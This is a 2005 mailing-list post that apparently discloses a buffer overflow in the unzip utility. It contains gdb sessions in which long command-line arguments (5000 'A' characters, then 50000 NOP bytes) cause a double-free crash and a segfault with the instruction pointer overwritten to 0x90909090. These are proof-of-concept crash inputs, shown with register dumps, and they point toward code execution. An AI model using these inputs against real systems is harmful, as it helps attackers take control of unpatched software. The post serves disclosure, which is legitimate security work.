Date: Mon Dec 19 12:06:16 2005
From: c0ntexb at gmail.com (c0ntex)
Subject: Unzip *ALL* versions ;))

Just to add to the pot, this little bug has been there a long time,
mmm, around 2+ yrs. Any apps calling unzip? Any unzip archives with
rather large files?

;)

[c0ntex@...uxbox tmp]$ gdb -q unzip
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) r `perl -e 'print "A" x 5000'`
Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...unzip: 
cannot find or open AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[snip]

AAAAAAAAAAAAAA.ZIP.
*** glibc detected *** double free or corruption: 0x08075008 ***

Program received signal SIGABRT, Aborted.
0xffffe410 in __kernel_vsyscall ()
(gdb) bt
#0  0xffffe410 in __kernel_vsyscall ()
#1  0x002a2955 in raise () from /lib/tls/libc.so.6
#2  0x002a4319 in abort () from /lib/tls/libc.so.6
#3  0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
#5  0x080543a6 in ?? ()
#6  0x08075008 in ?? ()
#7  0x00000005 in ?? ()
#8  0x00000000 in ?? ()
(gdb) frame 4
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
(gdb) i r
eax            0x0      0
ecx            0x10b7   4279
edx            0x6      6
ebx            0x39dff4 3792884
esp            0xbfdc2194       0xbfdc2194
ebp            0xbfdc21a8       0xbfdc21a8
esi            0x39f800 3799040
edi            0x8075008        134696968
eip            0x2dc4ba 0x2dc4ba
eflags         0x200246 2097734
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/s $edi
0x8075008:       'A' <repeats 196 times>
(gdb) x/s $esi
0x39f800 <main_arena>:   "\001"
(gdb)
0x39f802 <main_arena+2>:         ""
(gdb)


(gdb) r `python -c 'print "\x90" * 50000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in
wrong format
Starting program: /usr/bin/unzip `python -c 'print "\x90" * 50000'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)


--

regards
c0ntex
